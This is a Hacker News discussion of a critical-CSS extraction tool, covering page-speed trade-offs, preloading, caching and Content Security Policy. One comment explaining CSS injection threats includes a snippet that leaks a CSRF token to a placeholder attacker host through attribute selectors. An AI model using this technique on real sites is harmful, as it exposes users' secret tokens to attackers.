224 points by stevenpotts 2 days ago | 29 comments
  • lelandfe 2 days ago
    Nice one. Would be cool if this also handled responsiveness. The need to dedupe responsive critical styles has made me resort to manually editing all critical stylesheets I've ever made.

    I also see that this brings in CSS variable definitions (sorry, ~custom properties~) and things like that. Since critical CSS's size matters so much, it might be worth giving an option to compile all of that down.

    > Place your original non-critical CSS <link> tags just before the closing </body> tag

    I don't recommend doing this: you still want the CSS downloaded urgently, critical CSS is a façade. Moving to the end of body means the good stuff is discovered late, and thus downloaded late (and will block render if the preloader[0] discovers it).

    These days I'd recommend:

        <link rel="preload" href="styles.css" as="style" onload="this.rel='stylesheet'">
    
        <noscript><link rel="stylesheet" href="styles.css"></noscript>
    
    [0] https://web.dev/articles/preload-scanner
    • worble a day ago

          <link rel="preload" href="styles.css" as="style" onload="this.rel='stylesheet'">
      
      Wouldn't this be blocked by a CSP that doesn't allow unsafe-inline?
      • jy14898 a day ago
        unsafe-hashes is a decent alternative
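
        For the onload handler, that means hashing the handler's source text, roughly like this (hash value illustrative, computed over `this.rel='stylesheet'`):

            Content-Security-Policy: script-src 'self' 'unsafe-hashes' 'sha256-<base64 hash of the handler text>'
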
    • larodi 2 days ago
      the prefetch attribute and other HTTP header hints, combined with a proper CDN setup, do almost the same thing, and don't require the critical CSS to be rebuilt nonstop as the page develops. a properly configured CF is insanely fast.
      • todotask2 a day ago
        > HTTP header hints

        I assume it's either 103 Early Hints or Resource Hints over HTTP/1.1 and HTTP/2.
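
        For the 103 case, the server sends an informational response with Link headers ahead of the final response, roughly:

            HTTP/1.1 103 Early Hints
            Link: </styles.css>; rel=preload; as=style

            HTTP/1.1 200 OK
            Content-Type: text/html

        so the browser can start fetching the stylesheet before the HTML even arrives.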

    • Gabrys1 2 days ago
      +1 on responsiveness
    • youngtaff a day ago
      I wouldn’t use the JS hack to load CSS…

      When the stylesheet loads and is applied to the CSSOM, it's going to trigger style and layout calculations for the elements it applies to, maybe even the whole page

      Browsers are pretty eager at fetching stylesheets, even those at the bottom of the page

      • lelandfe a day ago
        That stylesheet application was going to happen anyway; the difference now is that FCP will occur before it.

        > Browsers are pretty eager at fetching stylesheets, even those at the bottom of the page

        Browsers begin fetching resources as they discover them. For a big enough document, that will mean low-placed resources suffer.

        • youngtaff 13 hours ago
          Sure, that work is going to happen, but often what you see is multiple stylesheets loaded using the async hack, which results in multiple style and layout calculations, as the browser can't coalesce them because it doesn't know that they're stylesheets or when they will arrive

          The whole philosophy of critical styles being those above the fold is a mistake in my view

          Far better to adopt approaches like those recommended by Andy Bell that dramatically reduce stylesheet size

          And do critical styles "correctly", i.e. load those that are needed to render the initial page, and separately load the ones that rely on interactions

  • oneeyedpigeon 2 days ago
    Feels like premature optimisation to me. Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile? Maybe with the most complex web apps, I guess, but for almost all cases, I would have thought writing clean CSS, HTML, and JavaScript would render this unnecessary or even counterproductive.
    • dan-bailey a day ago
      Oh my god, yes, this is useful. I do some freelance dev work for a small marketing agency, and I inherit a lot of Wordpress sites that show all the hallmarks of passing through multiple developers/agencies over the years, and the CSS and Javascript are *always* crufty with years of accumulated bad practices. I'm eager to try this.
    • bawolff a day ago
      > Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile?

      On the contrary, the more complex the css is or the more resources loaded, the less this would be worthwhile.

      The thing I think they are trying to optimize is latency due to RTT. When you first request the html file, the browser needs to read it before knowing the next thing to request. This requires a round trip to the server, which has latency (pesky speed of light). The larger your (critical) css, the more expensive this optimisation is, so the less likely it is to be a net benefit.

    • Gabrys1 2 days ago
      I would pay good money for this tool ~12 years ago. We had a site with enormous amounts of CSS that accumulated over the years and it was really unclear which rules are and which aren't critical
      • korm 25 minutes ago
        The mod_pagespeed filter "prioritize_critical_css" was released exactly 12 years ago in early May 2013. At least 3 more popular critical css tools were released the following year, integrating with Grunt, Gulp, and later Webpack.
    • acjohnson55 a day ago
      For many sites, this probably is a premature optimization. But for sites that live off of click-through, like news/media, getting the text on screen is critical. Bounce rate starts to go up and ad revenue drops as soon as page loads stop feeling "immediate", which is about 1 second. The full page can actually be quite heavy once all the ads, scripts, and media load.

      We were doing this optimization more than a decade ago when I worked at HuffPost.

    • dimmke a day ago
      Seriously. When I look at the modern state of front-end development, it's actually fucking bonkers to me. Stuff like Lighthouse has caused people to reach for optimizations that are completely absurd.

      This might make an arbitrary number go up in test suites, at the cost of massively increasing build complexity and reducing ease of working on the project, all for very minimal (if any) improvement for the hypothetical end user (who will be subject to much greater forces outside the developer's control, like their network speed)

      I see so much stuff like this, then regularly see websites that are riddled with what I would consider to be very basic user interface and state management errors. It's absolutely infuriating.

      • rglover a day ago
        Yup. Give people a number or stat to obsess over and they'll obsess over it (while ignoring the more meaningful work like stability and fixing real, user-facing bugs).

        Over-obsession with KPIs/arbitrary numbers is one of the side-effects of managerial culture that badly needs to die.

        • mediumsmart 17 hours ago
          It's just a few meaningful numbers: 0 accessibility errors, an A+ on securityheaders, a flawless result on webkoll 5july.net, plus below-1-second loading time on PageSpeed mobile. Once that has been achieved, obsessing over stabilizing a flaky bloat pudding while patching over bugs-aka-features that annoy every user will have died.
    • leptons a day ago
      > Feels like premature optimisation to me.

      To me, thinking about how CSS loads is task #1, but I probably have some unique needs.

      We were losing clients due to our web offering scoring poorly on page speed tests. Page speed being part of how a page is ranked can affect SEO (depending on who you ask), so it is very important to our clients. It's not my job to explain how I think SEO works, it's my job to make our clients happy.

      I had to design a whole new system to get page speed scores to 100% on Google Lighthouse, which many of our clients were using to test their site's performance. When creating a site optimized for performance, how the CSS and JS and everything loads needs to be thought about before implementing the pages. It can be pretty difficult to optimize these things after-the-fact. We made pretty much everything on the page load in-line including JS and CSS, and the CSS for what displays "above the fold" loads above the HTML it styles. Everything "below the fold" gets loaded below the fold. No FOUC, nothing blocking the rendering of the page. No extra HTTP requests are made to load any of the content. A lot of the JS "below the fold" does not even get evaluated until it is scrolled into view, because that can also slow down page load speed. I took all the advice Google Lighthouse was giving me, and implemented our pages in a way that satisfies it completely. It wasn't really that difficult but it required me changing my thinking about how to approach building websites.
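
      A minimal sketch of that deferred-evaluation idea (the `text/lazy` type and `data-lazy-section` attribute are made-up markers, not our actual implementation):

          // Run below-the-fold scripts only once their section scrolls into view
          const observer = new IntersectionObserver((entries) => {
            for (const entry of entries) {
              if (!entry.isIntersecting) continue;
              // Swap the inert type for a real script element so the browser evaluates it
              entry.target.querySelectorAll('script[type="text/lazy"]').forEach((s) => {
                const real = document.createElement('script');
                real.textContent = s.textContent;
                s.replaceWith(real);
              });
              observer.unobserve(entry.target);
            }
          });
          document.querySelectorAll('[data-lazy-section]').forEach((el) => observer.observe(el));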

      We were coming from a system that we didn't control, where they decided to load all of the CSS for the entire website on every page, which was amounting to about 3 to 4 MB of CSS alone, and the Javascript was even worse. There was never an attempt to optimize that system from the start, and now many years later they can't seem to optimize it at all. I won't name that system because we still build on it, but it's a real problem for us when a client compares their SEO and page speed scores to their competitors and then they leave us for our competitors, which score only a bit better for page speed.

      If performance is the goal, there is no such thing as premature optimization, it has to be thought about from the start. So far our clients have been very happy about their 100% page speed scores (100% even on mobile), and our competition can't come anywhere close, unless they put in the work and start thinking differently about the problem.

      I actually tried the tool that is the subject of this post on my sites, and it wouldn't work - likely because there is nothing to optimize. We simply don't do any HTTP requests for CSS, and the CSS we need "above the fold" is already "above the fold". I tried it on one of the old pages and it did give a result, but I don't need it because we don't build pages like we used to anymore.

  • todotask2 2 days ago
    When I tested mine, I got the following:

    Built on Astro web framework

    HTML: 27.52KB uncompressed (6.10KB compressed)

    JS: <10KB (compressed)

    Critical CSS: 57KB uncompressed (7KB compressed) — tested using this site for performance analysis.

    In comparison, many similar sites range from 100KB (uncompressed) to as much as 1MB.

    The thing is, I can build clean HTML with no inline CSS or JavaScript. I also added resource hints (not Early Hints, since my Nginx setup doesn't support that out of the box), which slightly improve load times when combined with HTTP/2 and short-interval caching via Nginx. This setup allows me to hit a 100/100 performance score without relying on Critical CSS or inline JavaScript.
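
    For the Nginx part, a resource hint can be as small as a Link response header (path illustrative):

        # nginx.conf: send a preload hint along with the HTML response
        location / {
            add_header Link "</css/main.css>; rel=preload; as=style";
        }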

    If every page adds 7KB, isn’t it wasteful—especially when all you need is a lightweight SPA or, better yet, more edge caching to reduce the carbon footprint? We don’t need to keep transmitting unnecessary data around the world with bloated HTML like Elementor for WordPress.

    Why serve users unnecessary bloat? Mobile devices have limited battery life. It's not impossible to achieve a lightning-fast experience once you move away from shared-hosting territory.

    • robotfelix a day ago
      It's worth noting that including Critical CSS in every page load isn't the only way to use it.

      A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already) or only using the Critical CSS technique for pages that commonly come at the start of a session.
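
      A minimal sketch of that heuristic, assuming an Express-style server (the cookie name and the `criticalCss`/`renderPage` helpers are hypothetical):

          const express = require('express')
          const app = express()

          app.get('/*', (req, res) => {
            // Treat the presence of our cookie as "full CSS is probably cached"
            const returning = (req.headers.cookie || '').includes('css_cached=1')
            if (!returning) res.setHeader('Set-Cookie', 'css_cached=1; Max-Age=31536000; Path=/')
            const head = returning
              ? '<link rel="stylesheet" href="/main.css">'
              : `<style>${criticalCss}</style>` // plus the async load of the full CSS
            res.send(renderPage(head))
          })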

      • todotask2 15 hours ago
        > A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already)

        I’ve thought about that before but couldn’t figure out the ideal approach. Using a unique session cookie for non-logged-in users isn’t feasible, as it could lead to memory or storage issues if a malicious actor attempts a DDoS attack.

        I believe this approach also doesn’t work well for static pages, which are likely already hosted close to users.

        One useful trick to keep in mind is that CSS content-visibility only applies in certain scenarios. One agency I came across was using an <iframe> for every section, which is a bad idea.

        So my conclusion is that mobile-first CSS is generally more practical, plus a PWA, which I'm building now for a site that has lots of listings.
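
        For reference, the typical content-visibility use is plain CSS (class name illustrative):

            /* Skip rendering work for off-screen sections; reserve space
               so the scrollbar doesn't jump as they paint in */
            .below-fold-section {
              content-visibility: auto;
              contain-intrinsic-size: auto 600px;
            }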

    • kijin 2 days ago
      Yeah, it's a neat trick but kinda pointless. In a world with CDNs and HTTP/2, all this does is waste bandwidth in order to look slightly better in artificial benchmarks.

      It might improve time to first paint by 10-20ms, but this is a webpage, not a first-person shooter. Besides, subsequent page loads will be slower.

      • aitchnyu 2 days ago
        Yup, wherever we deviated from straightforward asset downloads to optimize something, we always ended up slower or buggy. Like manually downloading display images or using websockets to upload stuff. Turns out servers and browsers have had more person-years of optimization put into them than I could ever match.
      • todotask2 a day ago
        And critical CSS requires loosening the CSP (Content Security Policy), which I have already hardened almost entirely, along with the Permissions Policy.
      • nashashmi a day ago
        Imagine this: before serving the page, a filter seeks out the critical css, inserts it, and removes all css links, greatly improving page load times and reducing CDN loads.

        Edit: on second reading, it seems like you are saying that when another page from the same server with the same style loads again, the css would have to be reloaded, and this increases bandwidth in cases where a site visitor loads multiple pages. So yes, it is optimal for conditions where the referrer is external to the site.

  • lxe a day ago
    This is a footgun. You'll get a very consistent flash of unstyled content. It's not just an aesthetics issue -- when layout shifts in the middle of a page load, as your "non-critical" styles are applied, and user is interacting with something, it will kill your usability.
    • zaphodias a day ago
      Isn't the whole point avoiding FOUC, while also avoiding blocking the render on CSS network requests?
      • lxe a day ago
        Unless you're sure that the "non-critical" CSS doesn't cause layout shifts (i.e., it doesn't override any "critical" styles), you're gonna see layout shifts even on fast connections if you load some styles at the top of the document and then do a link rel at the bottom.
        • rtsil a day ago
          The critical css should cover everything above the fold to avoid that visible reflow.
          • youngtaff a day ago
            Where’s the fold in a world of thousands of viewports?
          • lxe a day ago
            Then what does the "non-critical" css do?
            • bawolff a day ago
              The non-critical things?

              I mean, I agree with you that this is insanely easy to screw up. However, on most websites there is obviously css which doesn't cause reflows and is not needed for first paint. Actually separating that out correctly seems easy to mess up, but it obviously exists.

  • stevenpotts 2 days ago
    I searched online for tools to extract the critical CSS of a website for one of my clients, but couldn't find one that did the job (I even found a paid one, and requested a refund after it didn't work). So I built my own with Puppeteer locally, then decided to share the solution I used; it lets you specify how long to wait after page load before extracting the styles.

    Feedback welcome, it's free for now.

    • jefozabuss 2 days ago
      What was the problem with something like https://www.npmjs.com/package/penthouse ?
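
      For reference, penthouse's basic usage is roughly this (paths and viewport values illustrative):

          const penthouse = require('penthouse')

          penthouse({
            url: 'https://example.com',
            css: 'path/to/full.css', // or pass cssString directly
            width: 1300,  // viewport treated as "above the fold"
            height: 900,
          }).then((criticalCss) => {
            // write criticalCss out, or inline it into the page template
          })
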
    • al_borland 2 days ago
      FYI: a bit of an edge case, as I don’t know why anyone would realistically do this, but if a site without CSS is passed, it throws an error.
    • promiseofbeans 2 days ago
      Is the code somewhere? This seems like it'd be really useful as a Vite/Astro plugin
      • cAtte_ 2 days ago
        yeah, doing this manual copy-paste process every time you change something would count as cruel and unusual punishment
    • indeyets 2 days ago
      Is it a UI for the penthouse lib? The settings look very similar :)
  • bawolff a day ago
    I guess this just assumes that this is the first view of your page and no user has css resources cached?

    Or maybe they are saying this would always be worth it?

    I assume it'd be a trade off between a number of factors. How many returning vs new visitors? Is css served with proper cache-control headers, 103 early hints and in a cdn? How big is your critical css, and how much of your critical html does it push out of the initial congestion window?

  • defied 8 hours ago
    We created this as a free tool a while back on TestingBot: https://testingbot.com/free-online-tools/critical-css-genera....

    It uses a remote browser to start a Puppeteer session and runs JavaScript code to extract the critical CSS needed for above-the-fold content. We chose Puppeteer because it’s fast to instrument the browser and works well even on JavaScript-heavy sites.

    • stevenpotts an hour ago
      I will test it out, didn't find it!
  • austin-cheney 2 days ago
    When I was doing performance examinations from localhost I found that CSS was mostly inconsequential if written at least vaguely efficiently and requested as early as possible from the HTML. By completely removing CSS I might be able to save up to 7ms of load time, but that was extremely hard to tell because that was well within the variance between test intervals.

    https://github.com/prettydiff/wisdom/blob/master/performance...

    • bawolff a day ago
      Obviously trying to do an optimization designed to reduce the impact of latency between client <-> server is going to have no impact if you are testing on localhost where latency is already effectively zero.

      That's not to say I think this optimization is necessarily worth it, just that testing on localhost is not a good test of this.

  • RadiozRadioz a day ago
    I prefer a different approach: write your HTML in such a way that the page makes sense and is usable without CSS. It's also a good guiding star for your page's complexity; if your document markup is simple, sensible and meaningful, you're probably not overcomplicating your layout.
    • chipsrafferty a day ago
      This doesn't really work for sites where reading text left to right, top to bottom is not the primary focus.
  • GavinAnderegg a day ago
    Neat idea. I tried it on my site (https://anderegg.ca/) which already inlines its CSS, and got an error from the underlying library (https://www.npmjs.com/package/penthouse):

        {"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
  • kqr 2 days ago
    Hm. When I tried this on my site it retained a debugging element that is decidedly not required, but adds a lot of bytes to the CSS:

        body::after{display:none;content:"";background-image:url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' width='1' height='29'><rect style='fill: rgb(196,196,196);' width='1' height='0.25px' x='0' y='28'/></svg>");position:absolute;top:23px;left:0px;z-index:9998;opacity:1;width:1425px;height:3693px;background-size:auto 1.414rem;background-position-y:0.6rem}
    
    (It lets me uncheck the "display: none" rule in the developer tools to get a baseline grid overlaid on the site to make sure things line up. They don't anymore because I forgot I had that in there until I saw it now!)
  • weo3dev a day ago
    Not a fan.

    I'm waiting for the day developers realize the fallacy of sticking with pixels as their measurement for Things on the Internet.

    With a deeper understanding of CSS, one would recognize that simply parsing it out for only the components "above the fold" (which, why are pixels being used here in such an assumptive manner?) completely misses what is being used in modern CSS today - global variables, content-centric declarations, units based on character widths, and so many other tools that would negate "needing" to do this in the first place.

  • Brajeshwar 2 days ago
    I’ve been away for quite a while, so I’m just thinking out loud.

    With tools such as PostCSS, and servers serving zipped styles across CDNs with a single request for the styles, does it really benefit from breaking up the styles these days?

    Also, I’m going to assume, besides the core styles that run a website, anything that is loaded later can come in with its specific styles as part of the HTML/JS.

    For the critical CSS thing, we used to kinda do it by hand with some automation, more as a toolset to help us decide how much to include (inside the HTML itself - `<style>`) and then insert the stylesheet. But then, we always found it better to set a Stylesheet Budget and work with it.

    • a_gray a day ago
      > serving zipped styles across CDN

      Browser caches haven't been shared across domains for years. I.e. using a CDN is no faster than the server serving it itself (usually slower because of DNS lookups, though sometimes slightly faster if the geolocation is closer and the DNS was already looked up).

      • bigbuppo a day ago
        The performance impact of CDNs is definitely a complicated matter and always has been. They aren't a magic solution to any problem unless you're exceeding the origin's available bandwidth, or are serving up something that should be cacheable but somehow can't live without whatever it is that Elementor does that makes it worth every request taking 75 seconds to complete.
  • jer0me 2 days ago
    Kind of funny that the agency that made this has a loader on their site.
    • Manfred 2 days ago
      It would only be ironic if they released a tool to get rid of loading on a page.

      > Critical CSS refers to the minimal set of CSS rules required to render the visible portion of a webpage (above the fold).

      In reality the tool is aimed at styling most of the page without loading additional assets, so you don't get a jarring repaint when visiting the site.

      • chrismorgan a day ago
        I prepared a comment about how the whole thing should be well under 5KB uncompressed, plus four small images and a background video that I couldn’t quite figure out, and about how the loader made no sense and made things worse. But then I checked in Chromium before stopping, and discovered that apparently the website is just completely broken in Firefox for some reason, so that you only get to see the above-the-fold content. But it still definitely hasn’t earned the loader. And also demonstrates why messing with scrolling is a bad idea.
  • sublinear 2 days ago
    Non-starter for all but hobby websites since it's incompatible with any content security policy disallowing inline style tags.

    Edit regarding replies to this comment: I'm sure many will get a kick out of your workarounds, and they're all worth posting in the spirit of HN; however, I am talking about CSPs that disallow shenanigans. Carry on though :^)

    • efortis 2 days ago
      You can allow safe inline CSS with a hash of the style element's contents. For example:

        <style>
          html { background: red }
        </style>
      
      And a CSP like this

        default-src 'self'; style-src 'sha256-Ce2SAZQd/zkqF/eKoRIUmEqKy31enl1LPzhnYs3Zb/I='
      
      
      Here's how I automate mine:

      https://github.com/uxtely/js-utils/blob/ad7d9531e108403a4146...

    • its-summertime 2 days ago
      It's completely compatible, if you separate dynamic content until after the critical css is loaded: https://posts.summerti.me/being-unsafe-safely/
    • pjc50 2 days ago
      > content security policy disallowing inline style tags

      Wait, why on earth is this a thing?

      • bawolff a day ago
        The threats solved by restricting CSS with CSP are pretty minor, but generally it's to prevent injection attacks that do the following:

        - injecting css to restyle the page as part of a social engineering attack or to otherwise trick the user into doing something stupid

        - using css to load an image or something to track users viewing the page or capture their IP address

        - leak the values of attributes on the page (you can do complex things with ^= and ~= selectors to leak attribute values). Sometimes page text contents can also be leaked using tricks with fonts and scrollbars (not sure if that still works on modern browsers).

        On the whole though, the surface area is small compared to javascript. I often see people restrict css before js (or do the js restrictions incorrectly) because restricting css is much easier, but that is really silly, as an attacker will always reach for javascript first if it's available.
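
        The attribute-leak trick looks roughly like this (attacker domain obviously illustrative); each matching rule fires a request that reveals one more character of the value:

            /* Injected CSS probing a hidden token one prefix at a time */
            input[name="csrf"][value^="a"] { background: url(https://evil.example/leak?p=a); }
            input[name="csrf"][value^="b"] { background: url(https://evil.example/leak?p=b); }
            /* ...then value^="aa", value^="ab", and so on */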

      • hombre_fatal a day ago
        I guess the main case is if user-generated content has an escape bug that lets the user inject a <style> tag?
        • throwaway290 a day ago
          If only this were about UGC. Most of it can have nothing to do with actual users. Think stuff like ads, or other injections like a dependency of a dependency of a dependency of your frontend app compromised by a North Korean hacker.
    • yakshaving_jgt 2 days ago
      That’s a good point, though can’t this instance be whitelisted with a nonce?
      • sublinear 2 days ago
        You could, but in the real world not every frontend dev has control over the CSP on the server, so nonces aren't even an option.

        Even when they do, they might be subject to a security audit forbidding it. There are two reasons nonces can suck: the first is that nonces may be passed around for 3rd-party script usage, which blows a hole in your security policy, and the other is that many nonce-generation implementations are not done correctly, so the security team might have less trust in devs.

        It really depends on the organization and project. Once you start getting near the security fence you may find it's more trouble than it's worth.

        I would try to find less complicated solutions for small details like this. Obvious question might be why your CSS can't be a separate file that is small enough to not cause a performance issue.

  • aligundogdu a day ago
    Is there any limit etc.? It gives an error on my first try.

    {"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}

  • crazygringo a day ago
    I don't really understand the point of this.

    Most of the CSS that gets used below the fold on most pages gets used above it too. Especially when considering it needs to handle large desktop monitors, and responsiveness. And the remaining part (e.g. styling a footer) is tiny.

    The CSS "bloat" that you might want to delay loading is CSS for the rest of the entire site, including all sorts of legacy stuff that might not even be used anymore.

    There are lots of strategies for how to load CSS used only by the page, as opposed to the site, which involve various tradeoffs, but can be worth it.

    But loading CSS for part of a page seems almost nonsensical. It's not like lazy-loading large images, where we're sometimes talking about megabytes. The CSS used on any single page is usually pretty small to begin with, and even smaller zipped.

    • davidmurdoch 21 hours ago
      It reduces round-trips. The ultimate goal used to be (in the 2010s) to ensure the first TCP packet had everything the browser needed to render the layout without any additional round-trips. Rare to go that extreme these days, of course.
      • crazygringo 6 hours ago
        But it increases overall bandwidth, because you're adding a bunch of CSS to every page that can't be cached.

        That's a terrible tradeoff.

        And if a site has a single CSS file, there's only ever a CSS round-trip on the first page. There aren't any round-trips afterwards.

        • davidmurdoch 4 hours ago
          Well, yes, but also no. It really depends on your website. SPAs can benefit, especially ones that utilize server-side rendering, as they don't have multiple pages anyway. And not all MPAs need to optimize for multi-page navigation either; sometimes websites aren't intended to be heavily navigated, or if they are, common navigation can make use of preloads.

          This technique is usually combined with preloads so the parser can identify assets that should be prefetched while the remaining packets are still being downloaded.

          If your "Critical CSS" is small enough (i.e., it fit well within the client's CWND), it is very possible it doesn't increase the total number of roundtrips at all.

          As a web developer, if you are optimizing for above-the-fold CSS, you are already optimizing in lots of other ways, and should be fully cognizant of the potential trades for the optimization solutions that are available to you.

          • crazygringo 2 hours ago
            I really continue to disagree. SPA's seem like the least likely of anything to benefit -- they often don't even have a concept of "below the fold", as they have a workspace-like environment, not a scrolling-document one. And not only is loading time generally less important for them (unlike news articles), but they're used constantly, so the CSS is almost always cached anyways.

            There are lots of ways to optimize CSS. I continue to think this particular one is not a good idea under any circumstance, because it's anti-caching, and eliminating a single round-trip once is just not ever going to be worth it.

            • davidmurdoch 26 minutes ago
              Doesn't matter if you disagree, it is still an optimization tool that can be used in some circumstances.

              The data is most definitely cached if the server sets the cache expiry for the HTML file, so "anti-caching" makes no sense and is completely orthogonal to the optimization.

              If the page's critical CSS is small enough you can deliver an HTML page where the initial render a) happens sooner, and b) is a complete skeleton of your layout + initial content. All at the low low price of ~0 additional client-server round-trips.

              Fun fact: Facebook inlines a `style` tag and all HTML necessary to render their initial loading screen. It isn't what I would call "above the fold" CSS, but it is what is referred to as "Critical CSS".

              Aside: the most popular and most-used SPAs are scrollers: twitter, instagram, facebook, github, etc, so now I wonder if you might be just trolling?

  • juancroldan a day ago
    This is a great idea even as a build step in web projects. You set a list of viewports you want to optimize for in your package.json, import critical-css as a dev dependency, configure it in your vite.config.js or equivalent, and away you go.
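
    A rough sketch of that wiring, using the npm package "critical" (a different tool from the one posted here) in a hand-rolled plugin; option values are illustrative:

        // vite.config.js
        import { defineConfig } from 'vite'
        import { generate } from 'critical'

        export default defineConfig({
          plugins: [{
            name: 'inline-critical-css',
            apply: 'build',
            async closeBundle() {
              await generate({
                base: 'dist/',
                src: 'index.html',
                target: 'index.html',
                inline: true, // inline critical rules, async-load the rest
                dimensions: [
                  { width: 375, height: 667 },
                  { width: 1440, height: 900 },
                ],
              })
            },
          }],
        })
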
  • gitroom 2 days ago
    the amount of tiny tweaks that stack up in css is kinda nuts tbh - always felt like chasing performance can be endless. makes me wonder if any dev really feels satisfied with their setup or if it's just a bunch of tradeoffs
    • internetter a day ago
      I am. I don't know if it's perfect, but it is more than good enough.
  • lenkite 2 days ago
    Assuming you are using an atomic-CSS framework like Tailwind, this would be unnecessary, right? Since all the CSS class names are inlined on the element anyway.
    • DecoySalamander 2 days ago
      Your page would still need the full CSS sheet loaded to render properly - Tailwind classes do nothing on their own.
      • hombre_fatal a day ago
        That said, if all of your css is referenced by html classes, it would be trivial to look at the html that's above the fold and derive which css you need to load first, which could be kinda cool.
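
        A back-of-the-envelope version of that idea, run in the browser (the `data-above-fold` marker is a made-up convention):

            // Collect every class referenced in the above-the-fold markup
            const used = new Set()
            document.querySelectorAll('[data-above-fold] [class], [data-above-fold][class]')
              .forEach((el) => el.classList.forEach((c) => used.add(c)))
            // A build step could then keep only the utility rules whose
            // selectors reference classes in `used`, and defer the rest
            console.log([...used])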
  • Recursing a day ago
    See also beasties ( https://github.com/danielroe/beasties ) formerly critters ( https://github.com/GoogleChromeLabs/critters ) which can be used to do this during SSR/SSG and is built into Nuxt and NextJS
  • aabbcc1241 19 hours ago
    It would be great if it were packaged as a library.
  • tiffanyh a day ago
    Seems to only work if the CSS is an external file.

    (Not embedded within the HEAD/STYLE tag)

  • worthless-trash 2 days ago
    Why worry about this when companies package 10MB of JavaScript? Is this really where the problem is?
    • bigbuppo a day ago
      I'm sad to say that the average is now 11MB.
    • chipsrafferty a day ago
      If a candy or soda can go from 50g sugar to 40g without a significant change in flavor, they definitely want to. They don't have to get to 5g for it to be worthwhile.
  • n3storm 2 days ago
    WordPress plugins and builders like Divi and Elementor have been inserting all the css for every page part or component anywhere in the body for years. I hate it. But does this critical css mean they have been doing it right all along?
    • optimog 2 days ago
      No, having an external file makes it cacheable locally. If every new page loads some of the same css again and again, it's a waste of bandwidth. You should already have the stylesheet on your computer by then.
      • Klonoar 21 hours ago
        I often wonder if this bandwidth is as big a deal as people make it out to be.

        On a very high traffic site, sure. Anything smaller and I’d argue you should just shove everything down the pipe in one request if you can.

        If the bandwidth bothers you, delete an image. You likely don’t have anywhere near that amount in CSS to make up.

      • n3storm a day ago
        Thank you.

        Can anybody tell me why I got two downvotes for my question?

  • rado 2 days ago
    Not working in Safari. Says ‘done’ but the Generated CSS box remains empty.
    • k4rli a day ago
      Does not work in IE11 either :(
  • vaylian a day ago
    > Better Lighthouse scores

    What does that mean? What is Lighthouse?

  • Theodores a day ago
    This comes in handy with the bloated codebase I am running from, bravo.

    My problem is the codebase I am running towards. I am making headway with scoped CSS; however, Firefox does not have it yet. I keep checking in on Firefox to see when it is going to support scoped CSS, but I have not been able to determine what the hold-up is.

    Does anyone have scoped CSS working with a workaround or compromise for Firefox?
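
    One rough approximation that works in Firefox today is writing the "donut scope" out by hand with a relational :not() (class names illustrative):

        /* Where @scope is supported: */
        @scope (.card) to (.card-body) {
          h2 { color: teal; }
        }

        /* Firefox fallback: same donut, written manually */
        .card h2:not(.card .card-body *) { color: teal; }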
